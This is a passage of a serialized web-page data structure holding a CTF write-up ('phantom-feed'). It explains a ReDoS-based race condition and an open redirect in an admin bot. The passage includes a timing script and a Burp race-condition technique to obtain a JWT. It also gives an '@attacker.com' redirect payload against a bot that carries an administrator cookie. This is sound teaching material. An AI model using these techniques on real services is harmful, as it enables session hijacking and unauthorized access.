"children":30911},{"style":523},[30912],{"type":38,"value":9683},{"type":33,"tag":128,"props":30914,"children":30916},{"style":30915},"--shiki-default:#E6CC77",[30917],{"type":38,"value":30918},"\\.",{"type":33,"tag":128,"props":30920,"children":30921},{"style":312},[30922],{"type":38,"value":2966},{"type":33,"tag":128,"props":30924,"children":30925},{"style":523},[30926],{"type":38,"value":25605},{"type":33,"tag":128,"props":30928,"children":30929},{"style":151},[30930],{"type":38,"value":30931},"[a-zA-Z]",{"type":33,"tag":128,"props":30933,"children":30934},{"style":523},[30935],{"type":38,"value":30936},"{2,9}",{"type":33,"tag":128,"props":30938,"children":30939},{"style":312},[30940],{"type":38,"value":2966},{"type":33,"tag":128,"props":30942,"children":30943},{"style":437},[30944],{"type":38,"value":3651},{"type":33,"tag":128,"props":30946,"children":30947},{"style":676},[30948],{"type":38,"value":836},{"type":33,"tag":128,"props":30950,"children":30951},{"class":130,"line":839},[30952],{"type":33,"tag":128,"props":30953,"children":30954},{"emptyLinePlaceholder":896},[30955],{"type":38,"value":899},{"type":33,"tag":128,"props":30957,"children":30958},{"class":130,"line":848},[30959,30964],{"type":33,"tag":128,"props":30960,"children":30961},{"style":1576},[30962],{"type":38,"value":30963}," try",{"type":33,"tag":128,"props":30965,"children":30966},{"style":312},[30967],{"type":38,"value":5318},{"type":33,"tag":128,"props":30969,"children":30970},{"class":130,"line":976},[30971,30976,30980,30985,30989,30994,30998,31003,31007,31011],{"type":33,"tag":128,"props":30972,"children":30973},{"style":323},[30974],{"type":38,"value":30975}," match ",{"type":33,"tag":128,"props":30977,"children":30978},{"style":312},[30979],{"type":38,"value":315},{"type":33,"tag":128,"props":30981,"children":30982},{"style":323},[30983],{"type":38,"value":30984}," re",{"type":33,"tag":128,"props":30986,"children":30987},{"style":312},[30988],{"type":38,"value":215},{"type":33,"tag":128,"props":30990,"children":30991},{"style":323},[30992],{"type":38,"value":30993},"match",{"type":33,"tag":128,"props":30995,"children":30996},{"style":312},[30997],{"type":38,"value":5566},{"type":33,"tag":128,"props":30999,"children":31000},{"style":323},[31001],{"type":38,"value":31002},"pattern",{"type":33,"tag":128,"props":31004,"children":31005},{"style":312},[31006],{"type":38,"value":5584},{"type":33,"tag":128,"props":31008,"children":31009},{"style":323},[31010],{"type":38,"value":29816},{"type":33,"tag":128,"props":31012,"children":31013},{"style":312},[31014],{"type":38,"value":2427},{"type":33,"tag":128,"props":31016,"children":31017},{"class":130,"line":988},[31018,31022,31026],{"type":33,"tag":128,"props":31019,"children":31020},{"style":312},[31021],{"type":38,"value":344},{"type":33,"tag":128,"props":31023,"children":31024},{"style":151},[31025],{"type":38,"value":29750},{"type":33,"tag":128,"props":31027,"children":31028},{"style":312},[31029],{"type":38,"value":3262},{"type":33,"tag":47,"props":31031,"children":31032},{},[31033],{"type":38,"value":31034},"We can therefore try to see if sending a large email would cause the server to hang.",{"type":33,"tag":47,"props":31036,"children":31037},{},[31038],{"type":38,"value":31039},"With a small test script and a 25-character email, we can see that the function takes more than 2 seconds to execute.",{"type":33,"tag":114,"props":31041,"children":31042},{"lang":10227},[31043],{"type":33,"tag":119,"props":31044,"children":31046},{"className":10231,"code":31045,"language":10227,"meta":8,"style":8},"# test.py\nimport datetime\nimport re\n\npattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\ntime_now = datetime.datetime.now()\nemail = \"a\"*25\nre.match(pattern, email)\ntime_after = datetime.datetime.now()\nprint(time_after - time_now)\n",[31047],{"type":33,"tag":105,"props":31048,"children":31049},{"__ignoreMap":8},[31050,31058,31070,31082,31089,31237,31276,31309,31345,31381],{"type":33,"tag":128,"props":31051,"children":31052},{"class":130,"line":131},[31053],{"type":33,"tag":128,"props":31054,"children":31055},{"style":5541},[31056],{"type":38,"value":31057},"# test.py\n",{"type":33,"tag":128,"props":31059,"children":31060},{"class":130,"line":362},[31061,31065],{"type":33,"tag":128,"props":31062,"children":31063},{"style":1576},[31064],{"type":38,"value":10244},{"type":33,"tag":128,"props":31066,"children":31067},{"style":323},[31068],{"type":38,"value":31069}," datetime\n",{"type":33,"tag":128,"props":31071,"children":31072},{"class":130,"line":403},[31073,31077],{"type":33,"tag":128,"props":31074,"children":31075},{"style":1576},[31076],{"type":38,"value":10244},{"type":33,"tag":128,"props":31078,"children":31079},{"style":323},[31080],{"type":38,"value":31081}," re\n",{"type":33,"tag":128,"props":31083,"children":31084},{"class":130,"line":739},[31085],{"type":33,"tag":128,"props":31086,"children":31087},{"emptyLinePlaceholder":896},[31088],{"type":38,"value":899},{"type":33,"tag":128,"props":31090,"children":31091},{"class":130,"line":765},[31092,31097,31101,31105,31109,31113,31117,31121,31125,31129,31133,31137,31141,31145,31149,31153,31157,31161,31165,31169,31173,31177,31181,31185,31189,31193,31197,31201,31205,31209,31213,31217,31221,31225,31229,31233],{"type":33,"tag":128,"props":31093,"children":31094},{"style":323},[31095],{"type":38,"value":31096},"pattern ",{"type":33,"tag":128,"props":31098,"children":31099},{"style":312},[31100],{"type":38,"value":315},{"type":33,"tag":128,"props":31102,"children":31103},{"style":300},[31104],{"type":38,"value":30807},{"type":33,"tag":128,"props":31106,"children":31107},{"style":676},[31108],{"type":38,"value":669},{"type":33,"tag":128,"props":31110,"children":31111},{"style":437},[31112],{"type":38,"value":30816},{"type":33,"tag":128,"props":31114,"children":31115},{"style":312},[31116],{"type":38,"value":5566},{"type":33,"tag":128,"props":31118,"children":31119},{"style":151},[31120],{"type":38,"value":30825},{"type":33,"tag":128,"props":31122,"children":31123},{"style":312},[31124],{"type":38,"value":5566},{"type":33,"tag":128,"props":31126,"children":31127},{"style":151},[31128],{"type":38,"value":30834},{"type":33,"tag":128,"props":31130,"children":31131},{"style":437},[31132],{"type":38,"value":30839},{"type":33,"tag":128,"props":31134,"children":31135},{"style":151},[31136],{"type":38,"value":354},{"type":33,"tag":128,"props":31138,"children":31139},{"style":523},[31140],{"type":38,"value":9683},{"type":33,"tag":128,"props":31142,"children":31143},{"style":151},[31144],{"type":38,"value":30825},{"type":33,"tag":128,"props":31146,"children":31147},{"style":312},[31148],{"type":38,"value":2966},{"type":33,"tag":128,"props":31150,"children":31151},{"style":523},[31152],{"type":38,"value":9683},{"type":33,"tag":128,"props":31154,"children":31155},{"style":16561},[31156],{"type":38,"value":29642},{"type":33,"tag":128,"props":31158,"children":31159},{"style":312},[31160],{"type":38,"value":13071},{"type":33,"tag":128,"props":31162,"children":31163},{"style":151},[31164],{"type":38,"value":30825},{"type":33,"tag":128,"props":31166,"children":31167},{"style":312},[31168],{"type":38,"value":2966},{"type":33,"tag":128,"props":31170,"children":31171},{"style":523},[31172],{"type":38,"value":25605},{"type":33,"tag":128,"props":31174,"children":31175},{"style":312},[31176],{"type":38,"value":5566},{"type":33,"tag":128,"props":31178,"children":31179},{"style":151},[31180],{"type":38,"value":30888},{"type":33,"tag":128,"props":31182,"children":31183},{"style":437},[31184],{"type":38,"value":30839},{"type":33,"tag":128,"props":31186,"children":31187},{"style":151},[31188],{"type":38,"value":354},{"type":33,"tag":128,"props":31190,"children":31191},{"style":523},[31192],{"type":38,"value":9683},{"type":33,"tag":128,"props":31194,"children":31195},{"style":151},[31196],{"type":38,"value":30825},{"type":33,"tag":128,"props":31198,"children":31199},{"style":312},[31200],{"type":38,"value":2966},{"type":33,"tag":128,"props":31202,"children":31203},{"style":523},[31204],{"type":38,"value":9683},{"type":33,"tag":128,"props":31206,"children":31207},{"style":30915},[31208],{"type":38,"value":30918},{"type":33,"tag":128,"props":31210,"children":31211},{"style":312},[31212],{"type":38,"value":2966},{"type":33,"tag":128,"props":31214,"children":31215},{"style":523},[31216],{"type":38,"value":25605},{"type":33,"tag":128,"props":31218,"children":31219},{"style":151},[31220],{"type":38,"value":30931},{"type":33,"tag":128,"props":31222,"children":31223},{"style":523},[31224],{"type":38,"value":30936},{"type":33,"tag":128,"props":31226,"children":31227},{"style":312},[31228],{"type":38,"value":2966},{"type":33,"tag":128,"props":31230,"children":31231},{"style":437},[31232],{"type":38,"value":3651},{"type":33,"tag":128,"props":31234,"children":31235},{"style":676},[31236],{"type":38,"value":836},{"type":33,"tag":128,"props":31238,"children":31239},{"class":130,"line":804},[31240,31245,31249,31254,31258,31263,31267,31272],{"type":33,"tag":128,"props":31241,"children":31242},{"style":323},[31243],{"type":38,"value":31244},"time_now ",{"type":33,"tag":128,"props":31246,"children":31247},{"style":312},[31248],{"type":38,"value":315},{"type":33,"tag":128,"props":31250,"children":31251},{"style":323},[31252],{"type":38,"value":31253}," datetime",{"type":33,"tag":128,"props":31255,"children":31256},{"style":312},[31257],{"type":38,"value":215},{"type":33,"tag":128,"props":31259,"children":31260},{"style":323},[31261],{"type":38,"value":31262},"datetime",{"type":33,"tag":128,"props":31264,"children":31265},{"style":312},[31266],{"type":38,"value":215},{"type":33,"tag":128,"props":31268,"children":31269},{"style":323},[31270],{"type":38,"value":31271},"now",{"type":33,"tag":128,"props":31273,"children":31274},{"style":312},[31275],{"type":38,"value":7857},{"type":33,"tag":128,"props":31277,"children":31278},{"class":130,"line":839},[31279,31284,31288,31292,31296,31300,31304],{"type":33,"tag":128,"props":31280,"children":31281},{"style":323},[31282],{"type":38,"value":31283},"email ",{"type":33,"tag":128,"props":31285,"children":31286},{"style":312},[31287],{"type":38,"value":315},{"type":33,"tag":128,"props":31289,"children":31290},{"style":676},[31291],{"type":38,"value":679},{"type":33,"tag":128,"props":31293,"children":31294},{"style":140},[31295],{"type":38,"value":53},{"type":33,"tag":128,"props":31297,"children":31298},{"style":676},[31299],{"type":38,"value":669},{"type":33,"tag":128,"props":31301,"children":31302},{"style":300},[31303],{"type":38,"value":9683},{"type":33,"tag":128,"props":31305,"children":31306},{"style":523},[31307],{"type":38,"value":31308},"25\n",{"type":33,"tag":128,"props":31310,"children":31311},{"class":130,"line":848},[31312,31317,31321,31325,31329,31333,31337,31341],{"type":33,"tag":128,"props":31313,"children":31314},{"style":323},[31315],{"type":38,"value":31316},"re",{"type":33,"tag":128,"props":31318,"children":31319},{"style":312},[31320],{"type":38,"value":215},{"type":33,"tag":128,"props":31322,"children":31323},{"style":323},[31324],{"type":38,"value":30993},{"type":33,"tag":128,"props":31326,"children":31327},{"style":312},[31328],{"type":38,"value":5566},{"type":33,"tag":128,"props":31330,"children":31331},{"style":323},[31332],{"type":38,"value":31002},{"type":33,"tag":128,"props":31334,"children":31335},{"style":312},[31336],{"type":38,"value":5584},{"type":33,"tag":128,"props":31338,"children":31339},{"style":323},[31340],{"type":38,"value":29816},{"type":33,"tag":128,"props":31342,"children":31343},{"style":312},[31344],{"type":38,"value":2427},{"type":33,"tag":128,"props":31346,"children":31347},{"class":130,"line":976},[31348,31353,31357,31361,31365,31369,31373,31377],{"type":33,"tag":128,"props":31349,"children":31350},{"style":323},[31351],{"type":38,"value":31352},"time_after ",{"type":33,"tag":128,"props":31354,"children":31355},{"style":312},[31356],{"type":38,"value":315},{"type":33,"tag":128,"props":31358,"children":31359},{"style":323},[31360],{"type":38,"value":31253},{"type":33,"tag":128,"props":31362,"children":31363},{"style":312},[31364],{"type":38,"value":215},{"type":33,"tag":128,"props":31366,"children":31367},{"style":323},[31368],{"type":38,"value":31262},{"type":33,"tag":128,"props":31370,"children":31371},{"style":312},[31372],{"type":38,"value":215},{"type":33,"tag":128,"props":31374,"children":31375},{"style":323},[31376],{"type":38,"value":31271},{"type":33,"tag":128,"props":31378,"children":31379},{"style":312},[31380],{"type":38,"value":7857},{"type":33,"tag":128,"props":31382,"children":31383},{"class":130,"line":988},[31384,31389,31393,31397,31401,31406],{"type":33,"tag":128,"props":31385,"children":31386},{"style":437},[31387],{"type":38,"value":31388},"print",{"type":33,"tag":128,"props":31390,"children":31391},{"style":312},[31392],{"type":38,"value":5566},{"type":33,"tag":128,"props":31394,"children":31395},{"style":323},[31396],{"type":38,"value":31352},{"type":33,"tag":128,"props":31398,"children":31399},{"style":300},[31400],{"type":38,"value":907},{"type":33,"tag":128,"props":31402,"children":31403},{"style":323},[31404],{"type":38,"value":31405}," time_now",{"type":33,"tag":128,"props":31407,"children":31408},{"style":312},[31409],{"type":38,"value":2427},{"type":33,"tag":47,"props":31411,"children":31412},{},[31413],{"type":38,"value":31414},"You can find below the result of the execution of the script:",{"type":33,"tag":75,"props":31416,"children":31418},{"imgSrc":31417,":width":12028},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704226431/writeups/phantom-feed/test_regex.webp",[],{"type":33,"tag":47,"props":31420,"children":31421},{},[31422],{"type":38,"value":31423},"So, we can confirm that if we register a user with an email that is 25 characters long and then try to log in, we will have a valid token. This is because the boolean will be set to True at the time of login.",{"type":33,"tag":47,"props":31425,"children":31426},{},[31427],{"type":38,"value":31428},"With Burp, we can easily exploit a race condition like this. Just select the \"Send group (separate connections)\" option to exploit the vulnerability.",{"type":33,"tag":75,"props":31430,"children":31432},{"imgSrc":31431},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704325504/writeups/phantom-feed/burp_race_condition.webp",[],{"type":33,"tag":47,"props":31434,"children":31435},{},[31436],{"type":38,"value":31437},"After that, we can see that during the connection, a JWT token was sent to us by the application. This token allows us to access routes protected by a middleware, which we will see in the next section.",{"type":33,"tag":75,"props":31439,"children":31441},{"imgSrc":31440},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704311577/writeups/phantom-feed/burp_login_token.webp",[],{"type":33,"tag":40,"props":31443,"children":31445},{"id":31444},"open-redirect",[31446],{"type":38,"value":31447},"Open Redirect",{"type":33,"tag":47,"props":31449,"children":31450},{},[31451],{"type":38,"value":31452},"So now we have a valid user token, we can call the route to invoke the bot.",{"type":33,"tag":47,"props":31454,"children":31455},{},[31456,31458,31464,31466,31472],{"type":38,"value":31457},"When examining the bot's declaration, it becomes apparent that the \"link\" parameter, which we have control over, is being used in an insecure manner and is susceptible to open redirection.\nIf we submit a payload like ",{"type":33,"tag":105,"props":31459,"children":31461},{"className":31460},[],[31462],{"type":38,"value":31463},"@attacker.com",{"type":38,"value":31465}," the bot will be redirected to ",{"type":33,"tag":105,"props":31467,"children":31469},{"className":31468},[],[31470],{"type":38,"value":31471},"attacker.com",{"type":38,"value":215},{"type":33,"tag":114,"props":31474,"children":31475},{"lang":10227},[31476],{"type":33,"tag":119,"props":31477,"children":31479},{"className":10231,"code":31478,"language":10227,"meta":8,"style":8},"def bot_runner(link):\n chrome_options = Options()\n [...]\n client = webdriver.Chrome(options=chrome_options)\n client.get(\"http://127.0.0.1:5000\")\n\n token = create_jwt(1, \"administrator\")\n cookie = {\n \"name\": \"token\",\n \"value\": token,\n \"domain\": \"127.0.0.1\",\n \"path\": \"/\",\n \"expiry\": int((datetime.datetime.now() + datetime.timedelta(seconds=1800)).timestamp()),\n \"secure\": False,\n \"httpOnly\": True\n }\n client.add_cookie(cookie)\n\n client.get(\"http://127.0.0.1:5000\" + link) # \u003C--- Here is the open redirect\n time.sleep(10)\n client.quit()\n",[31480],{"type":33,"tag":105,"props":31481,"children":31482},{"__ignoreMap":8},[31483,31508,31529,31544,31592,31629,31636,31682,31698,31734,31762,31799,31835,31938,31966,31991,31998,32027,32034,32083,32113],{"type":33,"tag":128,"props":31484,"children":31485},{"class":130,"line":131},[31486,31490,31495,31499,31504],{"type":33,"tag":128,"props":31487,"children":31488},{"style":300},[31489],{"type":38,"value":10402},{"type":33,"tag":128,"props":31491,"children":31492},{"style":135},[31493],{"type":38,"value":31494}," bot_runner",{"type":33,"tag":128,"props":31496,"children":31497},{"style":312},[31498],{"type":38,"value":5566},{"type":33,"tag":128,"props":31500,"children":31501},{"style":323},[31502],{"type":38,"value":31503},"link",{"type":33,"tag":128,"props":31505,"children":31506},{"style":312},[31507],{"type":38,"value":10497},{"type":33,"tag":128,"props":31509,"children":31510},{"class":130,"line":362},[31511,31516,31520,31525],{"type":33,"tag":128,"props":31512,"children":31513},{"style":323},[31514],{"type":38,"value":31515}," chrome_options ",{"type":33,"tag":128,"props":31517,"children":31518},{"style":312},[31519],{"type":38,"value":315},{"type":33,"tag":128,"props":31521,"children":31522},{"style":323},[31523],{"type":38,"value":31524}," Options",{"type":33,"tag":128,"props":31526,"children":31527},{"style":312},[31528],{"type":38,"value":7857},{"type":33,"tag":128,"props":31530,"children":31531},{"class":130,"line":403},[31532,31536,31540],{"type":33,"tag":128,"props":31533,"children":31534},{"style":312},[31535],{"type":38,"value":718},{"type":33,"tag":128,"props":31537,"children":31538},{"style":151},[31539],{"type":38,"value":29750},{"type":33,"tag":128,"props":31541,"children":31542},{"style":312},[31543],{"type":38,"value":3262},{"type":33,"tag":128,"props":31545,"children":31546},{"class":130,"line":739},[31547,31552,31556,31561,31565,31570,31574,31579,31583,31588],{"type":33,"tag":128,"props":31548,"children":31549},{"style":323},[31550],{"type":38,"value":31551}," client ",{"type":33,"tag":128,"props":31553,"children":31554},{"style":312},[31555],{"type":38,"value":315},{"type":33,"tag":128,"props":31557,"children":31558},{"style":323},[31559],{"type":38,"value":31560}," webdriver",{"type":33,"tag":128,"props":31562,"children":31563},{"style":312},[31564],{"type":38,"value":215},{"type":33,"tag":128,"props":31566,"children":31567},{"style":323},[31568],{"type":38,"value":31569},"Chrome",{"type":33,"tag":128,"props":31571,"children":31572},{"style":312},[31573],{"type":38,"value":5566},{"type":33,"tag":128,"props":31575,"children":31576},{"style":306},[31577],{"type":38,"value":31578},"options",{"type":33,"tag":128,"props":31580,"children":31581},{"style":312},[31582],{"type":38,"value":315},{"type":33,"tag":128,"props":31584,"children":31585},{"style":323},[31586],{"type":38,"value":31587},"chrome_options",{"type":33,"tag":128,"props":31589,"children":31590},{"style":312},[31591],{"type":38,"value":2427},{"type":33,"tag":128,"props":31593,"children":31594},{"class":130,"line":765},[31595,31600,31604,31608,31612,31616,31621,31625],{"type":33,"tag":128,"props":31596,"children":31597},{"style":323},[31598],{"type":38,"value":31599}," client",{"type":33,"tag":128,"props":31601,"children":31602},{"style":312},[31603],{"type":38,"value":215},{"type":33,"tag":128,"props":31605,"children":31606},{"style":323},[31607],{"type":38,"value":13526},{"type":33,"tag":128,"props":31609,"children":31610},{"style":312},[31611],{"type":38,"value":5566},{"type":33,"tag":128,"props":31613,"children":31614},{"style":676},[31615],{"type":38,"value":669},{"type":33,"tag":128,"props":31617,"children":31618},{"style":140},[31619],{"type":38,"value":31620},"http://127.0.0.1:5000",{"type":33,"tag":128,"props":31622,"children":31623},{"style":676},[31624],{"type":38,"value":669},{"type":33,"tag":128,"props":31626,"children":31627},{"style":312},[31628],{"type":38,"value":2427},{"type":33,"tag":128,"props":31630,"children":31631},{"class":130,"line":804},[31632],{"type":33,"tag":128,"props":31633,"children":31634},{"emptyLinePlaceholder":896},[31635],{"type":38,"value":899},{"type":33,"tag":128,"props":31637,"children":31638},{"class":130,"line":839},[31639,31644,31648,31653,31657,31661,31665,31669,31674,31678],{"type":33,"tag":128,"props":31640,"children":31641},{"style":323},[31642],{"type":38,"value":31643}," token ",{"type":33,"tag":128,"props":31645,"children":31646},{"style":312},[31647],{"type":38,"value":315},{"type":33,"tag":128,"props":31649,"children":31650},{"style":323},[31651],{"type":38,"value":31652}," create_jwt",{"type":33,"tag":128,"props":31654,"children":31655},{"style":312},[31656],{"type":38,"value":5566},{"type":33,"tag":128,"props":31658,"children":31659},{"style":523},[31660],{"type":38,"value":7284},{"type":33,"tag":128,"props":31662,"children":31663},{"style":312},[31664],{"type":38,"value":5584},{"type":33,"tag":128,"props":31666,"children":31667},{"style":676},[31668],{"type":38,"value":679},{"type":33,"tag":128,"props":31670,"children":31671},{"style":140},[31672],{"type":38,"value":31673},"administrator",{"type":33,"tag":128,"props":31675,"children":31676},{"style":676},[31677],{"type":38,"value":669},{"type":33,"tag":128,"props":31679,"children":31680},{"style":312},[31681],{"type":38,"value":2427},{"type":33,"tag":128,"props":31683,"children":31684},{"class":130,"line":848},[31685,31690,31694],{"type":33,"tag":128,"props":31686,"children":31687},{"style":323},[31688],{"type":38,"value":31689}," cookie ",{"type":33,"tag":128,"props":31691,"children":31692},{"style":312},[31693],{"type":38,"value":315},{"type":33,"tag":128,"props":31695,"children":31696},{"style":312},[31697],{"type":38,"value":762},{"type":33,"tag":128,"props":31699,"children":31700},{"class":130,"line":976},[31701,31705,31709,31713,31717,31721,31726,31730],{"type":33,"tag":128,"props":31702,"children":31703},{"style":676},[31704],{"type":38,"value":12732},{"type":33,"tag":128,"props":31706,"children":31707},{"style":140},[31708],{"type":38,"value":12126},{"type":33,"tag":128,"props":31710,"children":31711},{"style":676},[31712],{"type":38,"value":669},{"type":33,"tag":128,"props":31714,"children":31715},{"style":312},[31716],{"type":38,"value":284},{"type":33,"tag":128,"props":31718,"children":31719},{"style":676},[31720],{"type":38,"value":679},{"type":33,"tag":128,"props":31722,"children":31723},{"style":140},[31724],{"type":38,"value":31725},"token",{"type":33,"tag":128,"props":31727,"children":31728},{"style":676},[31729],{"type":38,"value":669},{"type":33,"tag":128,"props":31731,"children":31732},{"style":312},[31733],{"type":38,"value":693},{"type":33,"tag":128,"props":31735,"children":31736},{"class":130,"line":988},[31737,31741,31745,31749,31753,31758],{"type":33,"tag":128,"props":31738,"children":31739},{"style":676},[31740],{"type":38,"value":12732},{"type":33,"tag":128,"props":31742,"children":31743},{"style":140},[31744],{"type":38,"value":14160},{"type":33,"tag":128,"props":31746,"children":31747},{"style":676},[31748],{"type":38,"value":669},{"type":33,"tag":128,"props":31750,"children":31751},{"style":312},[31752],{"type":38,"value":284},{"type":33,"tag":128,"props":31754,"children":31755},{"style":323},[31756],{"type":38,"value":31757}," token",{"type":33,"tag":128,"props":31759,"children":31760},{"style":312},[31761],{"type":38,"value":693},{"type":33,"tag":128,"props":31763,"children":31764},{"class":130,"line":1001},[31765,31769,31774,31778,31782,31786,31791,31795],{"type":33,"tag":128,"props":31766,"children":31767},{"style":676},[31768],{"type":38,"value":12732},{"type":33,"tag":128,"props":31770,"children":31771},{"style":140},[31772],{"type":38,"value":31773},"domain",{"type":33,"tag":128,"props":31775,"children":31776},{"style":676},[31777],{"type":38,"value":669},{"type":33,"tag":128,"props":31779,"children":31780},{"style":312},[31781],{"type":38,"value":284},{"type":33,"tag":128,"props":31783,"children":31784},{"style":676},[31785],{"type":38,"value":679},{"type":33,"tag":128,"props":31787,"children":31788},{"style":140},[31789],{"type":38,"value":31790},"127.0.0.1",{"type":33,"tag":128,"props":31792,"children":31793},{"style":676},[31794],{"type":38,"value":669},{"type":33,"tag":128,"props":31796,"children":31797},{"style":312},[31798],{"type":38,"value":693},{"type":33,"tag":128,"props":31800,"children":31801},{"class":130,"line":1014},[31802,31806,31811,31815,31819,31823,31827,31831],{"type":33,"tag":128,"props":31803,"children":31804},{"style":676},[31805],{"type":38,"value":12732},{"type":33,"tag":128,"props":31807,"children":31808},{"style":140},[31809],{"type":38,"value":31810},"path",{"type":33,"tag":128,"props":31812,"children":31813},{"style":676},[31814],{"type":38,"value":669},{"type":33,"tag":128,"props":31816,"children":31817},{"style":312},[31818],{"type":38,"value":284},{"type":33,"tag":128,"props":31820,"children":31821},{"style":676},[31822],{"type":38,"value":679},{"type":33,"tag":128,"props":31824,"children":31825},{"style":140},[31826],{"type":38,"value":7367},{"type":33,"tag":128,"props":31828,"children":31829},{"style":676},[31830],{"type":38,"value":669},{"type":33,"tag":128,"props":31832,"children":31833},{"style":312},[31834],{"type":38,"value":693},{"type":33,"tag":128,"props":31836,"children":31837},{"class":130,"line":1026},[31838,31842,31847,31851,31855,31860,31864,31868,31872,31876,31880,31884,31888,31892,31896,31900,31905,31909,31914,31918,31923,31928,31933],{"type":33,"tag":128,"props":31839,"children":31840},{"style":676},[31841],{"type":38,"value":12732},{"type":33,"tag":128,"props":31843,"children":31844},{"style":140},[31845],{"type":38,"value":31846},"expiry",{"type":33,"tag":128,"props":31848,"children":31849},{"style":676},[31850],{"type":38,"value":669},{"type":33,"tag":128,"props":31852,"children":31853},{"style":312},[31854],{"type":38,"value":284},{"type":33,"tag":128,"props":31856,"children":31857},{"style":437},[31858],{"type":38,"value":31859}," int",{"type":33,"tag":128,"props":31861,"children":31862},{"style":312},[31863],{"type":38,"value":13071},{"type":33,"tag":128,"props":31865,"children":31866},{"style":323},[31867],{"type":38,"value":31262},{"type":33,"tag":128,"props":31869,"children":31870},{"style":312},[31871],{"type":38,"value":215},{"type":33,"tag":128,"props":31873,"children":31874},{"style":323},[31875],{"type":38,"value":31262},{"type":33,"tag":128,"props":31877,"children":31878},{"style":312},[31879],{"type":38,"value":215},{"type":33,"tag":128,"props":31881,"children":31882},{"style":323},[31883],{"type":38,"value":31271},{"type":33,"tag":128,"props":31885,"children":31886},{"style":312},[31887],{"type":38,"value":9376},{"type":33,"tag":128,"props":31889,"children":31890},{"style":300},[31891],{"type":38,"value":8297},{"type":33,"tag":128,"props":31893,"children":31894},{"style":323},[31895],{"type":38,"value":31253},{"type":33,"tag":128,"props":31897,"children":31898},{"style":312},[31899],{"type":38,"value":215},{"type":33,"tag":128,"props":31901,"children":31902},{"style":323},[31903],{"type":38,"value":31904},"timedelta",{"type":33,"tag":128,"props":31906,"children":31907},{"style":312},[31908],{"type":38,"value":5566},{"type":33,"tag":128,"props":31910,"children":31911},{"style":306},[31912],{"type":38,"value":31913},"seconds",{"type":33,"tag":128,"props":31915,"children":31916},{"style":312},[31917],{"type":38,"value":315},{"type":33,"tag":128,"props":31919,"children":31920},{"style":523},[31921],{"type":38,"value":31922},"1800",{"type":33,"tag":128,"props":31924,"children":31925},{"style":312},[31926],{"type":38,"value":31927},")).",{"type":33,"tag":128,"props":31929,"children":31930},{"style":323},[31931],{"type":38,"value":31932},"timestamp",{"type":33,"tag":128,"props":31934,"children":31935},{"style":312},[31936],{"type":38,"value":31937},"()),\n",{"type":33,"tag":128,"props":31939,"children":31940},{"class":130,"line":1038},[31941,31945,31950,31954,31958,31962],{"type":33,"tag":128,"props":31942,"children":31943},{"style":676},[31944],{"type":38,"value":12732},{"type":33,"tag":128,"props":31946,"children":31947},{"style":140},[31948],{"type":38,"value":31949},"secure",{"type":33,"tag":128,"props":31951,"children":31952},{"style":676},[31953],{"type":38,"value":669},{"type":33,"tag":128,"props":31955,"children":31956},{"style":312},[31957],{"type":38,"value":284},{"type":33,"tag":128,"props":31959,"children":31960},{"style":1576},[31961],{"type":38,"value":30269},{"type":33,"tag":128,"props":31963,"children":31964},{"style":312},[31965],{"type":38,"value":693},{"type":33,"tag":128,"props":31967,"children":31968},{"class":130,"line":1051},[31969,31973,31978,31982,31986],{"type":33,"tag":128,"props":31970,"children":31971},{"style":676},[31972],{"type":38,"value":12732},{"type":33,"tag":128,"props":31974,"children":31975},{"style":140},[31976],{"type":38,"value":31977},"httpOnly",{"type":33,"tag":128,"props":31979,"children":31980},{"style":676},[31981],{"type":38,"value":669},{"type":33,"tag":128,"props":31983,"children":31984},{"style":312},[31985],{"type":38,"value":284},{"type":33,"tag":128,"props":31987,"children":31988},{"style":1576},[31989],{"type":38,"value":31990}," True\n",{"type":33,"tag":128,"props":31992,"children":31993},{"class":130,"line":1063},[31994],{"type":33,"tag":128,"props":31995,"children":31996},{"style":312},[31997],{"type":38,"value":6760},{"type":33,"tag":128,"props":31999,"children":32000},{"class":130,"line":1076},[32001,32005,32009,32014,32018,32023],{"type":33,"tag":128,"props":32002,"children":32003},{"style":323},[32004],{"type":38,"value":31599},{"type":33,"tag":128,"props":32006,"children":32007},{"style":312},[32008],{"type":38,"value":215},{"type":33,"tag":128,"props":32010,"children":32011},{"style":323},[32012],{"type":38,"value":32013},"add_cookie",{"type":33,"tag":128,"props":32015,"children":32016},{"style":312},[32017],{"type":38,"value":5566},{"type":33,"tag":128,"props":32019,"children":32020},{"style":323},[32021],{"type":38,"value":32022},"cookie",{"type":33,"tag":128,"props":32024,"children":32025},{"style":312},[32026],{"type":38,"value":2427},{"type":33,"tag":128,"props":32028,"children":32029},{"class":130,"line":1089},[32030],{"type":33,"tag":128,"props":32031,"children":32032},{"emptyLinePlaceholder":896},[32033],{"type":38,"value":899},{"type":33,"tag":128,"props":32035,"children":32036},{"class":130,"line":1101},[32037,32041,32045,32049,32053,32057,32061,32065,32069,32074,32078],{"type":33,"tag":128,"props":32038,"children":32039},{"style":323},[32040],{"type":38,"value":31599},{"type":33,"tag":128,"props":32042,"children":32043},{"style":312},[32044],{"type":38,"value":215},{"type":33,"tag":128,"props":32046,"children":32047},{"style":323},[32048],{"type":38,"value":13526},{"type":33,"tag":128,"props":32050,"children":32051},{"style":312},[32052],{"type":38,"value":5566},{"type":33,"tag":128,"props":32054,"children":32055},{"style":676},[32056],{"type":38,"value":669},{"type":33,"tag":128,"props":32058,"children":32059},{"style":140},[32060],{"type":38,"value":31620},{"type":33,"tag":128,"props":32062,"children":32063},{"style":676},[32064],{"type":38,"value":669},{"type":33,"tag":128,"props":32066,"children":32067},{"style":300},[32068],{"type":38,"value":8297},{"type":33,"tag":128,"props":32070,"children":32071},{"style":323},[32072],{"type":38,"value":32073}," link",{"type":33,"tag":128,"props":32075,"children":32076},{"style":312},[32077],{"type":38,"value":2966},{"type":33,"tag":128,"props":32079,"children":32080},{"style":5541},[32081],{"type":38,"value":32082}," # \u003C--- Here is the open redirect\n",{"type":33,"tag":128,"props":32084,"children":32085},{"class":130,"line":1114},[32086,32091,32095,32100,32104,32109],{"type":33,"tag":128,"props":32087,"children":32088},{"style":323},[32089],{"type":38,"value":32090}," 